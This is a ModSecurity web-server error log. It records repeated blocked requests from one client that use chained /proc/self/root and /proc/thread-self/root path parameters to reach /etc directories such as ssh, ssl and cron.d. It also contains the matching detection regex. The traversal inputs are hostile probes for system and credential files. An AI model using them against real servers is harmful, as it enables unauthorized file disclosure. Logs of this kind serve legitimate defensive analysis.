[Mon Mar 16 17:22:13.433602 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.241.46:58086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmdbysWC90G-1nBrBbuwAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:15.822906 2026] [:error] [pid 29507:tid 140411666392832] [client 74.7.241.46:58094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmd0r9dMAiw-8KANNe6gAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:17.107183 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:58106] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmeaQpVkWug9HeOt9MhgAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:19.130151 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:48744] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmev9ocpUE4ed4uDwKBAAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:22.707050 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.241.46:48750] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmfkr9dMAiw-8KANNe-AAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:23.991104 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:48764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmf7ABkC4fWIHEf8EMFwAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:25.127596 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:48768] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmgbABkC4fWIHEf8EMGQAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:27.585251 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:48776] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmg6QpVkWug9HeOt9MiAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:28.909288 2026] [:error] [pid 14895:tid 140411658000128] [client 74.7.241.46:52340] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmhFajLEzk2WiQ-10pwgAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:30.124282 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:52352] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmhlajLEzk2WiQ-10pwwAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:32.555917 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.241.46:52354] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmiKTCbgAP5jq5TehDvQAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:36.180898 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:52360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmjKTCbgAP5jq5TehDvwAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:38.939743 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:52364] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmjv9ocpUE4ed4uDwKCgAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:40.329407 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.241.46:40252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmkFajLEzk2WiQ-10pxAAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:43.787436 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.241.46:40268] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmk1ajLEzk2WiQ-10pyAAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:45.137333 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.241.46:40276] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmlbABkC4fWIHEf8EMHwAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:22:47.698696 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:40284] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhml7ABkC4fWIHEf8EMIgAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:23:44.113393 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:45934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhm0LABkC4fWIHEf8EMYQAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:24:03.646224 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.241.46:35098] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhm41ajLEzk2WiQ-10p6wAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:24:11.457425 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.241.46:54236] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhm6qTCbgAP5jq5TehD1AAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:24:14.120916 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:35438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhm7qTCbgAP5jq5TehD1gAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
